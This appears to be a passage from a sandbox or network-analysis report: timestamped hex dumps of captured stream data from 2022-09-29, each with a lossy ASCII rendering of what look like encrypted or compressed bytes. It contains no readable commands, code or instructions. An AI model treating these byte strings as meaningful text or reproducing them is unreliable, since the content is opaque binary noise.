                                                                                                                                                2022-09-29 12:48:42 UTC1442INData Raw: 3d 12 44 63 89 68 92 40 e3 e7 c4 b5 5a f5 fc 7e 03 fc 4f 73 28 eb 43 0c e8 6e d8 aa fb b9 62 ae e9 cc 14 b0 d6 c7 25 c9 13 aa eb 77 5e cc c4 78 72 5f 39 f9 4d e4 03 57 37 05 2d d3 a6 6e cb 64 cf fa da 5c f2 5e 98 49 84 cc 85 f8 cc 4d 00 e8 96 b2 7d 28 df ed 00 22 4c a2 31 e4 1c 39 15 0e 34 65 41 21 57 05 6b 19 c9 32 36 c1 3e f5 22 8b b8 4c 9c 9c dc 20 65 14 6f 8a 27 63 67 79 25 e1 4a f8 ef 1d b3 15 85 bf 5c ed 56 83 da 45 4a df f4 5a 17 9c 47 ad 4e 6c 0e 17 e6 47 60 13 5e 8a 0f 13 b9 b0 42 7b 9f 05 6a 38 53 d5 c3 99 60 34 bb 19 35 4b 7c 11 8b a9 70 4a 13 e8 ec 75 49 8c 2a c7 6b 38 33 c1 b7 e7 b7 a3 64 f8 00 c7 4f b6 d6 08 f8 ef fd 2f a9 11 64 02 b6 39 60 fc 95 7a 07 c2 c3 fe e7 1a b1 bc 86 9a ed 34 aa aa e0 ae ba 68 2c 51 83 9f e1 20 dc 6e b9 fa 8c ab b5
                                                                                                                                                Data Ascii: =Dch@Z~Os(Cnb%w^xr_9MW7-nd\^IM}("L194eA!Wk26>"L eo'cgy%J\VEJZGNlG`^B{j8S`45K|pJuI*k83dO/d9`z4h,Q n
                                                                                                                                                2022-09-29 12:48:42 UTC1458INData Raw: e1 18 88 0a d4 00 02 da 63 1f 44 f8 90 a0 f2 12 00 73 4b fe aa ed 09 11 3f 2b e2 a4 cf 43 70 6f 2d ba 08 e3 12 79 cd 65 1d c5 e6 c6 49 a1 0e b1 93 28 bb b2 1a 95 31 d3 cd c8 e8 79 17 d8 13 32 65 d2 37 0f ee 2d c8 92 ca c6 c6 ef ae 66 a7 1b 21 c1 6c 34 84 0a 7b 92 4f 9b 15 80 26 d5 2d 68 7a 72 5e e0 c1 0f f1 95 91 fe be ab 0e 2a 13 48 e8 23 5d 51 ad e7 91 fc 30 47 ca a1 17 4d 25 90 59 0e 51 2c 6a 06 d5 eb a5 aa 77 55 e9 f5 6b 48 4d 97 4d 80 e9 8c a1 be 2b 55 05 6f 2d 60 18 85 e2 1a 1b 98 e0 4b 78 6e 4b 15 bd 91 8b 5e 79 b1 00 ca e3 d4 cd 57 bd 63 81 d3 1f 6a f1 2e de b0 6c 03 1f 39 02 29 b0 c4 3f 56 31 d4 6a 88 98 2b 58 6b ad a7 e0 5e 71 ab ee 52 94 d3 cc cd 73 63 87 c9 d9 ad cb db 8d 6a 5e f6 0c cc 01 0f a5 41 d9 7e 37 fe 6a 36 ae f0 4b 0c 23 3a 5e eb 44
                                                                                                                                                Data Ascii: cDsK?+Cpo-yeI(1y2e7-f!l4{O&-hzr^*H#]Q0GM%YQ,jwUkHMM+Uo-`KxnK^yWcj.l9)?V1j+Xk^qRscj^A~7j6K#:^D
                                                                                                                                                2022-09-29 12:48:42 UTC1474INData Raw: 44 80 ff f9 a2 d2 be d8 7f 0a 01 6f 0c 0c 4d 69 7e 3a 92 8c ed 83 5e 58 aa e6 6b 77 ad e9 dd b0 fe c7 2c b4 4b 64 5a 6b a2 84 07 ef e6 ab 7c 34 20 b6 df d1 5a 3e 19 a4 80 0e 64 3b b8 70 ce 58 78 35 38 c0 2b e8 3f 11 fb cd 8b 2c ba b1 7e 61 20 40 7f 74 00 b9 f0 97 e8 c2 ec dd 83 d0 99 70 0f 01 65 aa 50 f4 1a 49 e1 df 71 58 af 46 14 69 07 5d 34 9b a8 b4 8b 94 14 86 97 41 79 60 30 f5 ae ad 7c 6f 07 5f 31 9b d0 ac ca aa 6b c9 29 fd 3f 4b 87 e7 5b 20 c3 42 d3 b1 21 bb ca 28 39 cb da b8 68 b8 35 a8 72 ab 91 f2 bc 25 d5 76 3a 89 0a d8 18 8f 85 df 0a ee 7f c0 47 c2 61 c3 91 c1 13 18 96 8f cb ff dc cf e2 be cf 29 3b 6a 42 90 e0 d9 83 3a 20 93 cb 34 ef 32 07 65 5c be c4 ae f7 9f 42 10 e3 f3 e7 e4 a9 28 f5 47 7f 92 62 aa 63 d2 9f 7a 5a 4b fc aa f6 09 2c 17 1b 16 18
                                                                                                                                                Data Ascii: DoMi~:^Xkw,KdZk|4 Z>d;pXx58+?,~a @tpePIqXFi]4Ay`0|o_1k)?K[ B!(9h5r%v:Ga);jB: 42e\B(GbczZK,
                                                                                                                                                2022-09-29 12:48:42 UTC1490INData Raw: 5b 26 42 05 b6 31 83 00 8e 83 a2 23 3a 0f ed d3 77 4a b1 ff d7 48 9f 78 1c f3 96 23 21 23 b6 ae 45 43 a8 2b d1 e1 51 22 85 26 f8 1f e8 a4 29 74 d9 e2 f8 5e 82 5e cb e6 cd ee 00 cb e8 c9 9e 7a 02 77 34 74 bb 79 72 e7 f8 69 2c 47 95 1b b6 dd f1 17 2c 3e 83 8e 2b ac a0 50 a7 ef 02 0b e3 65 1e 1e 76 27 5f 8d 32 e2 1b 1d 01 20 cc 90 e6 7c dd a3 35 ba 8b 9f 67 1d 65 01 fa c5 19 20 c7 63 43 08 c6 8d 6e 0c 28 57 d0 19 8e 59 ea 44 1b d6 82 5b 51 c9 1d b7 b5 49 93 77 6a 4d 47 96 15 a9 6e 14 f1 17 7d 15 02 39 d7 87 fd c7 bc 77 31 0e 93 aa a5 6f 91 1a 66 f4 8f 3c 45 3e 6f 22 d5 80 6f 09 e9 b2 9c 83 70 7e 71 dd 40 5b 52 e1 4c 5d ea dc 4a 41 19 0e 2e e7 03 a9 1c 37 0a 08 71 01 6e 5d 11 4c 68 74 f3 0f da cd fa 7c f2 c7 52 1d 4c 75 dc 9d 4f 5e 11 d0 c0 64 cf 1b 09 76 44
                                                                                                                                                Data Ascii: [&B1#:wJHx#!#EC+Q"&)t^^zw4tyri,G,>+Pev'_2 |5ge cCn(WYD[QIwjMGn}9w1of<E>o"op~q@[RL]JA.7qn]Lht|RLuO^dvD
                                                                                                                                                2022-09-29 12:48:42 UTC1506INData Raw: 7b 1f ab 19 aa ef 3e 03 71 87 df 70 8e 5e 8a 13 66 ea 8e 5e 06 37 a7 f3 9d aa fb df 24 79 33 4b 45 2e 00 07 83 57 21 43 37 9c e9 3f 4b 70 92 84 41 de b0 88 86 1b 23 b0 a3 c1 0b c9 3f 7d 89 d5 17 34 d9 b6 72 c3 44 10 f1 96 c8 62 ef dd d2 57 5c 0d a4 eb 0c 3f d8 f8 32 da ba da f0 b7 43 df 79 40 da 00 82 ec cb 57 6c 70 6c 5c ed 0e 4f 05 1a fd d8 6b 94 58 73 8b 53 f1 35 0c 80 d1 11 7c b8 29 dd a9 0d 8f 13 9c 9c 38 dd c6 ce 74 12 ca aa a1 c4 4f ef 00 22 6d a6 f4 87 3e ee 18 c7 2c 44 2d d2 e1 8f d1 0c 5c e3 c0 1d d1 23 84 10 98 9f a3 ea ec c3 ad ee fa 58 02 5c 19 67 02 1d c2 62 34 1a c4 89 cb f1 3b f9 5e 7a 2d 5f c2 bb 32 a6 56 e7 2f ac a1 27 5c f1 f6 d0 c1 6b ce 47 39 4d dc e2 1e 68 32 1d 8a 3b f9 4e b6 e3 fe e1 04 e6 e2 bf 39 4b 82 52 c1 a7 40 e7 c1 53 6c 46
                                                                                                                                                Data Ascii: {>qp^f^7$y3KE.W!C7?KpA#?}4rDbW\?2Cy@Wlpl\OkXsS5|)8tO"m>,D-\#X\gb4;^z-_2V/'\kG9Mh2;N9KR@SlF
                                                                                                                                                2022-09-29 12:48:42 UTC1522INData Raw: d0 89 bf 98 8c f7 e9 d1 db e3 e1 f7 13 e0 93 9d c6 cd b2 f7 7c 20 c6 33 d1 34 40 53 51 99 dd b4 e4 60 87 39 88 dc 4e cd e8 ec de ed 89 8d 16 40 d3 86 86 b1 54 0d 0f c2 a2 f7 bb 37 0c 36 9a 3d 0b 01 22 ee e8 0f 45 e5 64 a0 98 16 fa bb d1 0b 08 86 5c b7 d9 33 df f5 4c 41 ff 7a 6d 12 a5 05 8b 6c 03 7d c5 2e 2e 01 16 be 30 97 2a 0c 7f bc e8 dc d6 77 c7 ee 0f bc f6 11 86 ca 89 d6 e5 ba c3 a7 f0 ae c8 ed 0d 4f 8a 4e f9 bb 8c 7d a7 f4 cf 24 b1 da c7 22 d2 bf d5 56 66 7b fd 51 18 6f 38 b0 f8 dc a1 8a 14 50 c4 d9 3b f6 4b 7d 30 ab 4a 11 1a c0 d6 bd 42 5a 6f ce 76 6c ed b4 a4 05 0d fa b1 e5 14 e6 a8 4a 5e f7 d0 83 06 af 65 7d de c8 fb 06 f4 d9 6e 84 62 d7 57 b0 29 0d ba 3c da 66 b0 bb 28 b0 f9 a7 ca 61 69 74 2e 59 10 cf a8 7a 09 f4 7b 2c ba 8e 7a 89 e7 0c 57 cc ac
                                                                                                                                                Data Ascii: | 34@SQ`9N@T76="Ed\3LAzml}..0*wON}$"Vf{Qo8P;K}0JBZovlJ^e}nbW)<f(ait.Yz{,zW
                                                                                                                                                2022-09-29 12:48:42 UTC1538INData Raw: cc 81 b4 9b 43 db 9e 63 59 e1 33 42 3e 65 81 6b 45 42 67 ff 6b 64 aa b8 67 a3 d2 ec 9d 01 14 64 98 60 f5 58 80 fa c1 2d d5 a1 d5 46 fa cb 03 8e 17 41 03 73 7c 06 2b d8 9f d5 86 f1 43 6d 90 f2 e7 39 1f af 25 9d de 88 5a 8c 89 83 3e 18 da 2d 99 69 3c b5 ea 70 de 8f 67 a1 b4 bd 05 c9 ff 2a 1c 45 eb 9c dd 8d 00 6e 52 5c cb 18 16 d5 78 dc c2 a4 4d c1 a2 3c 9a 0e 09 9a a8 c7 51 4c e3 0a 7f 6e cf 5c 46 13 55 5d d8 6b 0c e6 ec a7 ab 6b 72 7a a8 62 67 da 19 7b 79 20 e0 e6 00 1d a3 a7 88 02 67 78 bd eb ea 36 fe 57 e6 d9 bc f2 37 31 8c b1 00 4f 25 01 4a ea 28 91 3c 8b e7 09 c4 f4 84 34 60 0f 47 87 60 10 a0 b8 f3 dd 40 e7 ab 45 dc cc c0 f1 6f 2b af f4 3f 7c 69 21 48 5a 4b 6a 5b dd 88 75 59 2b e1 ce ef ae 34 51 74 1e 84 af 17 1e f8 70 13 ba bc a7 2a 2c 60 4a d7 7f 0d
                                                                                                                                                Data Ascii: CcY3B>ekEBgkdgd`X-FAs|+Cm9%Z>-i<pg*EnR\xM<QLn\FU]kkrzbg{y gx6W71O%J(<4`G`@Eo+?|i!HZKj[uY+4Qtp*,`J
                                                                                                                                                2022-09-29 12:48:42 UTC1554INData Raw: 13 f6 81 64 c6 48 2e d7 97 72 a9 c5 f4 28 9f 52 29 10 c1 77 86 98 1b 6a 54 eb 36 0d a0 58 96 d5 f1 d1 63 db fa bc 60 f7 8c b8 ba 68 b4 a0 63 e8 74 81 bb e5 a2 2c e9 ee 45 25 df 16 b2 c0 b2 58 4f 78 ae 05 92 a5 32 f3 bf 77 18 5d 9a e3 b9 0f fc 67 c8 a6 85 80 4d ae 66 7e 06 80 9d ce 27 7b 96 06 04 da 52 99 67 2f be 42 0f 97 1a 01 eb 58 a6 ba af c4 8f 88 51 a1 27 98 f7 8f 25 2f 95 01 64 df 3b 4e ca 66 85 85 ff e6 ca d2 20 d7 00 80 0b 9e fc de da 2a ca 17 87 f0 ac ab f3 66 55 c1 1e 79 dd 7c be 9b 1a 3b 36 f9 f9 c6 46 df 29 fc 47 43 b6 85 2b 49 86 79 9e 11 c8 c3 4e 26 47 a8 73 9d 2b 6a ed 70 fc 16 d0 5d 2f fc 7e b3 82 e2 2a a3 0f 15 7a 8f 19 5d db 74 55 29 b5 1e f0 7b c4 7a 09 8b 80 f3 ef ca fd 02 6d 3d 97 f7 bb 19 a6 64 74 f6 15 f2 9e 77 a0 eb d5 c1 03 bf 72
                                                                                                                                                Data Ascii: dH.r(R)wjT6Xc`hct,E%XOx2w]gMf~'{Rg/BXQ'%/d;Nf *fUy|;6F)GC+IyN&Gs+jp]/~*z]tU){zm=dtwr
                                                                                                                                                2022-09-29 12:48:42 UTC1570INData Raw: 71 fc d1 6a 31 03 fd 51 54 99 77 1b 87 0b 76 ba 23 ea ce 14 43 5b 0c 47 ff bb 5e c5 c4 20 1f 46 e5 29 7e fa a1 1b 76 7f bf 8f b7 c9 54 b5 9e f7 ea 74 81 3b e0 00 3f 29 5b 06 f5 8f c6 12 50 46 93 88 4e a9 06 db 0b 22 82 0c 78 6f a5 1e e6 fe 37 a0 77 a7 d2 ad 42 5a 85 4d 42 a6 aa 0d 43 26 ea e5 93 e2 8c 48 58 56 af be f8 7c af 87 66 c8 66 ec c9 1f b0 ac 48 c4 ef b7 38 41 ba 18 43 ff 0b 42 34 2b 96 5a 13 33 78 7e 17 4e 55 a2 7b d8 17 b6 e2 4a 4e cf 40 1e 35 96 6c 75 ca 6d ae 64 fe 75 5e 37 c6 c9 ac d0 74 a8 5e a7 3b 66 d3 ad d3 0e 3b 11 11 1d 6e 7a 0b bd 03 57 2b a4 20 ee ba 0a c1 ff f2 4e 97 d5 52 35 80 12 15 82 4e 3b 75 8e 4c 3b c3 98 1f 76 03 ef 55 42 a9 b3 d2 62 d7 b0 74 2a 2e fd 48 25 c3 ef 62 eb e7 c8 82 f7 1f ed 75 17 0f d3 ea 88 b6 93 ff 23 60 53 f5
                                                                                                                                                Data Ascii: qj1QTwv#C[G^ F)~vTt;?)[PFN"xo7wBZMBC&HXV|ffH8ACB4+Z3x~NU{JN@5lumdu^7t^;f;nzW+ NR5N;uL;vUBbt*.H%bu#`S
                                                                                                                                                2022-09-29 12:48:42 UTC1586INData Raw: f7 c1 fc 94 d6 b7 25 80 dd 8c 3d 40 a9 74 93 d3 6b a3 aa 1a 93 62 13 f8 2d 69 6e a5 ff 60 2b a9 38 9d 90 25 0d 2e ab ca f0 30 7a 5a 3a a9 89 df 40 46 88 39 55 21 4e e7 d3 f3 26 26 2c ff d3 3b 55 37 ef 2b 7f ac e9 5d d3 7d 5b f4 77 54 1f 18 0b 75 13 fd 92 e5 da 25 81 9a 21 8c d6 4f b3 1a bb 65 72 79 e5 6f d7 a7 73 10 5f 2f 0c 17 37 9b d7 7d 6c c2 db f1 6f 7f 94 99 c3 a7 20 eb a1 73 d8 95 d0 b0 7e 57 c0 52 00 2f 16 c4 1b 32 06 1f a0 c9 3b 0e 9d 77 0f cd ae 0c 43 cb 35 b7 19 24 b5 1f 4a bb 0b 84 b6 b5 0c a3 bb a1 15 a1 43 ff f2 05 29 3b ef 7c 33 a5 82 1f d3 a9 ac 36 12 d9 bd c9 44 47 68 d6 84 99 a1 99 f9 5a d4 17 62 ab 80 27 84 bc 6e d8 0a 82 ce f5 1c 0a 6b e1 32 ca 09 81 f9 fe 94 a4 25 cd 01 49 41 96 90 88 51 22 bc 4c af ac 84 54 f1 c0 23 f7 93 76 ae c3 5c
                                                                                                                                                Data Ascii: %=@tkb-in`+8%.0zZ:@F9U!N&&,;U7+]}[wTu%!Oeryos_/7}lo s~WR/2;wC5$JC);|36DGhZb'nk2%IAQ"LT#v\
                                                                                                                                                2022-09-29 12:48:42 UTC1602INData Raw: 06 4c f5 e5 1c 64 f3 82 27 c0 6e ea 89 72 ee 2e 6b 41 75 ed 38 ba fc e8 fa 78 fe da d1 44 eb 1e 98 50 5c 27 ce f4 88 55 6e 68 28 01 65 d1 ce c8 82 57 86 fa bc 3b a5 52 d7 2d a1 46 62 dd 45 6a 1a 96 07 ec c3 47 fb 27 79 7a 43 3a 01 ea a5 88 70 db 24 97 bf f0 ea e9 33 f1 bb 9c a3 01 ee 5d d9 6b 27 e7 74 f4 f0 00 4e dd de eb 2b 70 09 4f ca 4b fd 30 14 2a 47 50 5d 78 dc b5 36 b1 db c3 6e 03 42 f2 95 93 fa d2 d0 b5 16 54 80 83 c1 40 eb 8a f8 31 31 8c b1 60 42 37 2a b5 60 14 e7 ef ea 14 3f 26 b0 a4 87 8f 74 9c 5a d0 cb 2a 44 fb b6 aa 5a 9a 3f b1 c1 37 db b0 0d 2a 49 42 55 fb 06 a8 cf 37 4b e2 73 cf 6b c9 dc b2 a7 77 69 ee d6 31 9a 4a c4 e0 58 8c d6 d4 73 a5 c5 2e 8b 48 8b 62 ff b8 15 50 11 7e 2c 50 8a 06 61 06 17 7b d9 50 6c df 3f 59 70 de c9 48 c7 8f 48 44 b1
                                                                                                                                                Data Ascii: Ld'nr.kAu8xDP\'Unh(eW;R-FbEjG'yzC:p$3]k'tN+pOK0*GP]x6nBT@11`B7*`?&tZ*DZ?7*IBU7Kskwi1JXs.HbP~,Pa{Pl?YpHHD
                                                                                                                                                2022-09-29 12:48:42 UTC1618INData Raw: cb 1b b9 92 36 01 ea d0 20 83 28 5a 2c 07 0b b5 dc e0 0c 1c 5b 0e 43 02 5e fc 8b ee 47 48 6b 4c 13 8e 75 df 17 f4 46 08 c6 fa 35 a9 dc 14 57 a0 6f 0b 70 70 1c 0d fa 6f f5 1a f3 c7 2e 95 0c d8 26 ed e4 74 e5 3b ed 58 0a 68 d9 5c 51 41 88 9a b2 5c 47 b4 9b de 53 d6 7b 59 90 08 0e 41 14 1e 6a 51 b8 f3 d4 71 f2 0e 82 de ed 25 af 96 ad 8b 2d 8f 2b 5d 28 2b 44 e7 e5 e1 8e 7c b5 b2 76 4c 75 98 24 0a d3 b1 95 bf d6 9f ad 2c af 8d bb f3 e8 5a d3 36 6b d0 30 f1 ab 94 5f 03 ec 06 50 d5 c5 16 4c b0 c2 80 60 62 93 b5 b9 3a c7 91 e2 96 99 6b 7e 05 74 cc 74 78 ed 17 4f 96 29 9c 09 ea bf 37 33 6a 48 5b a9 f5 0e 92 d0 47 62 73 2f 22 26 b1 cd 55 94 f4 b9 90 c8 86 67 07 4d cd aa e7 b3 a0 78 c7 70 02 dc b9 ee 33 a7 3d 05 6c ce 6e 55 f0 a5 5c 8d 6d 07 26 b6 86 2b 3b 8c 90 f4
                                                                                                                                                Data Ascii: 6 (Z,[C^GHkLuF5Woppo.&t;Xh\QA\GS{YAjQq%-+](+D|vLu$,Z6k0_PL`b:k~ttxO)73jH[Gbs/"&UgMxp3=lnU\m&+;
                                                                                                                                                2022-09-29 12:48:42 UTC1634INData Raw: d2 c6 19 0a 60 a9 fb ad 6f d1 95 73 cb d0 df 53 b8 dc 9a 3f ab 90 7f cd 93 1b da e7 44 06 25 ee 78 d4 19 05 bb 67 a7 a8 79 42 89 6e 50 0a 74 27 4e ed 2a 73 64 ec 32 29 4a c4 f4 aa 86 c5 4f 1a 13 a4 f4 fa b4 87 10 0a ac be 3c 62 0b 1b 7e 59 86 65 aa ba 09 bb 41 73 c8 ed c4 87 81 59 37 67 27 66 bd b7 a8 e8 67 ee 5a 98 36 94 de f1 33 fb 58 3b f6 5e ef c2 0a 9c 0a e3 ee 24 eb 6b ad c3 a5 2f 63 da 75 e1 e0 92 15 61 76 a4 5e 55 21 75 eb 6c f7 f5 43 ca d6 37 7e 95 fe 5a 7d 48 5b 7f b6 05 18 e9 79 ff a7 3b 0f 4f 85 21 8b 59 20 1b 24 22 2c c3 df 11 33 bb 46 c4 c0 8d 03 67 34 34 be a4 3a a6 a9 9f 2e f2 24 45 ca 9a f5 fa 80 cc 16 2e e3 7b 44 56 0a f2 00 bd cb c7 8a 85 a5 dc f0 bd 3b 61 ef ac fb 66 73 26 a2 a4 56 71 94 1e f4 73 09 ab 6b 74 20 3c fd d9 1e f3 fc 1f 1c
                                                                                                                                                Data Ascii: `osS?D%xgyBnPt'N*sd2)JO<b~YeAsY7g'fgZ63X;^$k/cuav^U!ulC7~Z}H[y;O!Y $",3Fg44:.$E.{DV;afs&Vqskt <
                                                                                                                                                2022-09-29 12:48:42 UTC1650INData Raw: d5 1a 09 8e fc 2a 6a 33 fd 77 ba 31 86 2a d6 c5 49 44 f9 32 25 3a e6 25 6f 12 a3 ca 08 98 df 83 1b c9 f9 02 34 b2 f8 c6 d4 27 28 59 9c ca 06 7f e6 94 1b 33 89 d6 7f a9 db 86 78 01 12 67 50 c4 62 84 04 73 33 c7 80 55 a8 0b a3 59 a6 34 3b 0a 35 2c 4a 36 ce 00 b7 84 b1 c4 2c 77 72 d7 14 20 25 7a 6f af 07 8d b7 df 7a 89 29 1e aa ed 37 bc b2 53 a2 c3 35 08 59 88 ee f7 21 8e 7f fa 3a 54 ab 8a ca c3 12 8d 9b ed 8b dc 66 59 55 07 42 c1 78 aa 9f ee f6 d6 9c 7a f6 76 3d bf 39 bd 8a 61 fe 2e 02 04 4e 97 13 17 66 ba e4 1d c7 f9 59 16 57 b7 69 67 f4 e7 59 96 c6 8d d4 cb 02 11 c0 22 5e bb 47 24 82 66 10 32 a0 f2 1a 1f db 2d f7 2d d5 66 87 08 69 eb 4b 01 0a 5e 20 22 d4 04 23 b8 ca cd 6c b3 f8 6f 09 46 82 41 b8 eb 29 b5 9c 83 b6 1e 32 3a c0 5f b4 cb 4d 27 1e a8 03 73 22
                                                                                                                                                Data Ascii: *j3w1*ID2%:%o4'(Y3xgPbs3UY4;5,J6,wr %zoz)7S5Y!:TfYUBxzv=9a.NfYWigY"^G$f2--fiK^ "#loFA)2:_M's"
                                                                                                                                                2022-09-29 12:48:42 UTC1666INData Raw: a5 74 d3 87 33 2c b6 f5 0d 34 f8 26 8a ee 84 ad f3 38 4f ce 76 65 45 bf 1a 00 12 b4 79 c1 58 4e 5d 76 fa 28 7a 27 fe ed 20 43 eb 72 bf 95 74 de 11 0d 0e 1c e7 f1 96 9a 17 24 a9 a4 db 95 69 11 cb 92 ac 04 0a 28 c6 a6 a1 48 87 de aa 13 fd fd 2d c8 4c 34 91 4f 09 df d6 c7 f2 2c 4d ce 57 9a 0d 5c 17 1b 64 d5 1e 26 92 a4 ca d4 c7 e0 0c c5 c5 8f f8 92 3a a1 88 26 25 3c be ff e2 18 f5 fd d4 34 51 6d 2a e6 22 7d bc 12 76 31 06 54 73 0d 6e 86 c3 1d a3 fe fb 6f 3e a9 d1 c5 00 44 96 03 db be 40 eb 4d 4a fe 56 27 33 9b 2c 05 b7 69 09 b4 ee bf 90 1f ee e5 8e 79 7b 1d 22 58 5d b3 04 52 7a 79 8f e2 fb 23 0d b1 83 e0 2e 37 c2 aa 2a c3 62 c3 7d d9 67 f4 cd 7e 42 ad 4d 79 35 2e b3 ed f4 6e 01 c7 2a 23 1a 6e f5 7f f8 d6 c4 66 3b 71 7d b2 b5 42 92 0c b3 8f 30 63 84 a0 a8 81
                                                                                                                                                Data Ascii: t3,4&8OveEyXN]v(z' Crt$i(H-L4O,MW\d&:&%<4Qm*"}v1Tsno>D@MJV'3,iy{"X]Rzy#.7*b}g~BMy5.n*#nf;q}B0c
                                                                                                                                                2022-09-29 12:48:42 UTC1682INData Raw: 6a 4e 66 b7 4f 25 dc bb 3a 66 53 cd ee d4 a3 b8 ff 93 a5 84 aa a7 ea 28 58 7a f0 0b 56 4c d9 fc 40 6c 6e a5 1a 9c 9e f8 66 e5 24 62 b7 63 dc db 89 d4 48 f1 22 c6 10 c7 fb 60 e0 1e cc 98 89 dd ea 34 aa 0c 88 e2 19 28 77 85 e4 4f 1f 9d 11 f0 66 70 5c 5d ec d4 89 94 7b 5f e5 b0 58 82 a1 01 c0 cb 8c 2d aa f1 c9 19 24 32 5a 93 d3 48 25 e4 6c 61 2f 4a e1 a0 d3 7d 28 64 eb bf eb 78 81 fa 22 11 70 46 02 78 a4 2d df ba 5e cd 85 60 84 43 1b 6e 0a f4 6f 04 5d c9 f6 23 84 18 fb 04 ab 19 b2 12 81 4e 17 3d ca d9 62 f6 7a 25 52 4c 09 33 c3 4b 63 90 90 75 6d 83 4d 80 4f b3 99 10 41 93 b7 38 b8 5e e1 4e 48 d8 9c 40 ae 5e a6 af 0b 0b a4 d2 66 0b d5 d8 97 bc dc 10 5d a8 bb 6a 4c 36 62 22 48 f4 e0 c4 bf 9a 54 4e 81 40 6c 1a d5 7b 66 0d ef 73 30 7c 16 ad 0e 7b 5c 25 13 ba 63
                                                                                                                                                Data Ascii: jNfO%:fS(XzVL@lnf$bcH"`4(wOfp\]{_X-$2ZH%la/J}(dx"pFx-^`Cno]#N=bz%RL3KcumMOA8^NH@^f]jL6b"HTN@l{fs0|{\%c
                                                                                                                                                2022-09-29 12:48:42 UTC1698INData Raw: 9c 99 2e 42 a9 85 fd ff fe eb 5a e5 e9 bb 8b 12 d8 28 e8 28 59 55 31 10 0f a4 fe 99 70 fc 5f 92 17 cf 2a 82 56 e8 92 da 85 22 62 fd be 05 7f 89 0b cb 1b 80 79 da 09 77 6a c4 80 46 c3 78 46 b2 75 3d ec 0f de 63 74 ea 61 cb 9f 00 0b 3b c0 f7 eb ee 98 d6 8d fd d8 6a a8 12 20 62 85 65 ad c1 83 3d e1 21 73 db f5 4e 6f f2 48 35 7c 49 e3 62 bf c1 ff 2d 15 72 c4 9e 0e 4d 26 ba 1e d7 73 35 a8 ed 40 71 f3 2a 60 84 21 7c bd ef ec f0 b7 60 6a 7d 8e a1 95 06 08 54 d3 cf 31 ad d0 5e a2 1b 60 fd 85 93 62 05 e4 d2 80 8b 02 7c 11 05 7a fa d4 85 cb 37 69 cf 4e 21 2b 06 06 86 a2 22 07 e0 6e b5 5e af 1b 18 09 96 15 e2 bf ea 69 b3 1a ce 02 58 46 58 9e f5 b1 4e df 4c 22 c8 18 0d 84 27 9f ef ca 83 33 9f fd 98 59 8f fd d5 7e c7 1d e0 9c b2 5b 19 b6 4a bc e7 d6 67 51 c4 7b cd 0e
                                                                                                                                                Data Ascii: .BZ((YU1p_*V"bywjFxFu=cta;j be=!sNoH5|Ib-rM&s5@q*`!|`j}T1^`b|z7iN!+"n^iXFXNL"'3Y~[JgQ{
                                                                                                                                                2022-09-29 12:48:42 UTC1714INData Raw: 7c 5d bc 8b c2 bc f4 f8 bd 27 db 99 55 1f 12 1b 57 d4 cc 92 56 6b 9e aa 91 31 0c 99 9c 80 7d 6b e9 17 61 e3 23 02 5c e0 7e be 11 e5 e2 aa 81 d7 06 e4 e5 11 05 86 e8 c7 0f 8a e6 82 53 cc 5a e0 0b ee c5 bd 79 db 7b 80 b8 d1 1c 4c 16 bf f6 5f c5 6f 6e f7 e0 99 11 53 42 3b 72 99 a0 32 f2 52 62 a1 f9 d8 35 76 fd 18 09 c9 61 f8 31 96 4a 30 1c 73 34 9a 9d c1 e0 a9 82 79 6f 9a c5 44 8f 21 f9 a6 bb d2 b0 82 c7 64 7d e9 26 6d 45 af 96 a3 06 1c c2 26 b3 8f af 5e 11 cb 62 1c f6 2e 90 ce cd be 1e 6b 06 34 22 b9 21 51 5f 4b dd e5 0b 38 9b 29 73 a3 42 de 77 a1 27 aa 47 45 66 b8 b2 b1 a9 29 dd c4 f5 db 35 48 01 84 48 6e d1 8c ab 61 81 9d 10 d2 94 95 ba 0f 08 cd e0 82 b1 a4 74 ad 0e 19 bb 67 cc fc 75 98 2e fe 5a b2 c6 cd f7 f4 8d 27 b1 fe 5e b1 a1 4c 2c fb 20 4d 57 e0 98
                                                                                                                                                Data Ascii: |]'UWVk1}ka#\~SZy{L_onSB;r2Rb5va1J0s4yoD!d}&mE&^b.k4"!Q_K8)sBw'GEf)5HHnatgu.Z'^L, MW
                                                                                                                                                2022-09-29 12:48:42 UTC1730INData Raw: ab df 93 5b 6b 32 92 cf d9 42 65 fa 5e 16 50 40 b7 1b 63 b1 be d3 d3 53 6f 25 00 2c 0c 2c 91 d8 4a 21 38 df d7 27 1a a5 3e 91 a4 3c e5 ef 9d 2a c1 aa 5a ce 22 e6 05 6a 08 ca ee 67 c0 75 e3 8b 23 2e c1 e6 dd bc da 35 d3 93 c2 62 ef 45 11 b1 e0 8a fa 2f 4a ca cc 80 30 c6 df 69 d3 1d 76 4e 99 05 82 45 a6 cc fb 52 cf bd f4 56 b0 40 15 71 96 41 59 c7 a9 bf 8f e5 4f 62 dc 0f 6a 3d 22 55 04 ad 04 ad a3 ff f5 a1 e6 f7 63 86 9f 05 a5 bd bd 71 37 db 6b f1 83 89 27 22 52 13 c8 36 02 46 a2 01 b9 38 b6 78 c2 6c 7f 87 f5 f4 18 ca 6e 2f 98 2e 8a d0 b8 1c 03 06 92 1f b1 a7 42 00 cf 9f 9a 1d 27 63 ac 73 1d d8 10 49 83 8a 4d a5 84 64 b8 0f d2 7c fd ce 64 d9 8c de 76 df 97 18 3a b9 1c e6 58 98 39 46 9d 2e d9 eb 71 40 23 8a 1d 04 e9 79 6c 48 26 74 69 ba c8 5b ed 58 28 1d 27
                                                                                                                                                Data Ascii: [k2Be^P@cSo%,,J!8'><*Z"jgu#.5bE/J0ivNERV@qAYObj="Ucq7k'"R6F8xln/.B'csIMd|dv:X9F.q@#ylH&ti[X('
